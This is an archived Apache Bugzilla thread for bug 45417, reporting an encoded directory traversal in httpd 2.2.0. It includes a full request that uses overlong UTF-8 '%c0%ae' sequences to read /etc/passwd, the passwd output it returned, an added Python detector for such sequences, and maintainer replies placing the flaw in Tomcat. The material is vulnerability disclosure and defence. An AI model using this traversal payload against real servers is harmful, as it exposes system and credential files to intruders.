Posted to bugs@httpd.apache.org by bu...@apache.org on 2008/07/17 10:52:21 UTC

DO NOT REPLY [Bug 45417] New: Directory Traversal Vulnerability

https://issues.apache.org/bugzilla/show_bug.cgi?id=45417

           Summary: Directory Traversal Vulnerability
           Product: Apache httpd-2
           Version: 2.2.0
          Platform: Other
        OS/Version: Linux
            Status: NEW
          Severity: critical
          Priority: P1
         Component: All
        AssignedTo: bugs@httpd.apache.org
        ReportedBy: bar4mi@gmail.com
                CC: bar4mi@gmail.com


Dear Bugzilla

I'm Simon Ryeo who is a computer security consultant in South Korea.
(My main job is penetration testing.)

I found a critical security problem on Apache 2.2.0. 
I'd like to find its major reason but I don't have any time because of my
project.
Also, I couldn't test it on the last version (2.2.9).

[Overview]
An attacker can get important files (/etc/passwd, etc.) of the system using
Apache 2.2.0.
He can do it just by using '%c0%ae%c0%ae', which means 'dot-dot-slash'.
It is just the encoded directory traversal attack.

[Exploit]
An attacker just requests the wanted files with '%c0%ae%c0%ae'.

GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0
Accept: */*
Accept-Language: ko-KR
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.target.com


HTTP/1.1 200 OK
Content-Length: 1411
Date: Mon, 14 Jul 2008 08:05:05 GMT
Server: Apache
Last-Modified: Sun, 06 Jul 2008 08:26:01 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: ko

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...


[Environments]
It was rebuilt from the published Apache 2.2.0 by the user. He used the
configurations and systems below.

1. build options
./configure --prefix=/usr/local/httpd-2.2.0 --enable-proxy \
  --enable-module=so --disable-auth --enable-include --disable-env \
  --disable-autoindex --disable-cgi --disable-negotiation --disable-imap \
  --disable-actions --disable-userdir --enable-dos --enable-rewrite

2. Operating System: Redhat Enterprise
3. Apache Version: apache 2.2.0
4. Httpd modules list 
     core.c
     mod_auth_file.c
     mod_authn_default.c
     mod_authz_host.c
     mod_authz_groupfile.c
     mod_authz_user.c
     mod_authz_default.c
     mod_auth_basic.c
     mod_include.c
     mod_filter.c
     mod_log_config.c
     mod_setenvif.c
     mod_proxy.c
     mod_proxy_ftp.c
     mod_proxy_http.c
     mod_proxy_ajp.c
     mod_proxy_balancer.c
     prefork.c
     http_core.c
     mod_mime.c
     mod_status.c
     mod_asis.c
     mod_dir.c
     mod_alias.c
     mod_rewrite.c
     mod_so.c
6. Additional modules
     mod_jk.so (version 1.2.1.5)
     mod_evasive20.so (version 1.10.1)


[My additional contact information]
barami@ahnlab.com (Ahnlab, Inc.)
bar4mi@apache-kr.org (The Apache Korea Group)



-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
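
The '%c0%ae' in the report above is a two-byte UTF-8 sequence that encodes '.' in non-shortest ("overlong") form, which a strict UTF-8 decoder must reject. The following is an added example, not part of the bug report and not httpd or Tomcat code: a Python check that flags overlong sequences in a percent-encoded request path, for instance when reviewing access-log entries. The function name and the sample paths in the comments are constructed for illustration.

```python
from urllib.parse import unquote_to_bytes

# Smallest code point that legitimately needs a 2-, 3- or 4-byte sequence.
MIN_CODE_POINT = {2: 0x80, 3: 0x800, 4: 0x10000}


def overlong_sequences(raw_path):
    """Return (offset, hex bytes, char a lenient decoder would yield) for
    every non-shortest-form UTF-8 sequence in the percent-decoded path."""
    data = unquote_to_bytes(raw_path)
    hits = []
    i = 0
    while i < len(data):
        lead = data[i]
        # ASCII, stray continuation bytes and invalid leads are not
        # candidates for an overlong sequence: skip one byte.
        if lead < 0xC0 or lead >= 0xF8:
            i += 1
            continue
        n = 2 if lead < 0xE0 else 3 if lead < 0xF0 else 4
        seq = data[i:i + n]
        # Truncated sequence or a non-continuation byte: malformed, not overlong.
        if len(seq) < n or any((c & 0xC0) != 0x80 for c in seq[1:]):
            i += 1
            continue
        # Assemble the code point the way a lenient decoder would.
        cp = lead & (0xFF >> (n + 1))
        for c in seq[1:]:
            cp = (cp << 6) | (c & 0x3F)
        if cp < MIN_CODE_POINT[n]:
            hits.append((i, seq.hex(), chr(cp)))
        i += n
    return hits


if __name__ == "__main__":
    # Constructed sample request paths.
    for path in ("/%c0%ae%c0%ae/etc/passwd",      # pattern from the report
                 "/%ed%95%9c%ea%b8%80.html",      # legitimate UTF-8 (Korean)
                 "/a%e0%80%aeb"):                 # three-byte overlong '.'
        print(path, overlong_sequences(path))
```

A path with any hit can be rejected or alerted on before it reaches a back-end that decodes URLs itself; legitimate UTF-8 paths produce no hits.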


DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417


Will Rowe <wr...@apache.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|RESOLVED                    |CLOSED




--- Comment #2 from Will Rowe <wr...@apache.org>  2008-08-02 16:01:25 PST ---
Note there is a workaround with the Tomcat 6.0.18 release of last week that
will allow you to use UTF8 URLs again, safely.  The flaw was on the Java side
and not as you reported on the httpd side.




DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417





--- Comment #1 from Joe Orton <jo...@redhat.com>  2008-07-17 02:46:22 PST ---
1) what configuration is being used?  Please attach the httpd.conf
2) please try removing the non-httpd modules:

     mod_jk.so (version 1.2.1.5)
     mod_evasive20.so (version 1.10.1)

and see whether you can still reproduce this.




DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417


jfclere <jf...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
                 CC|                            |jfclere@gmail.com






DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417


Simon <ba...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME



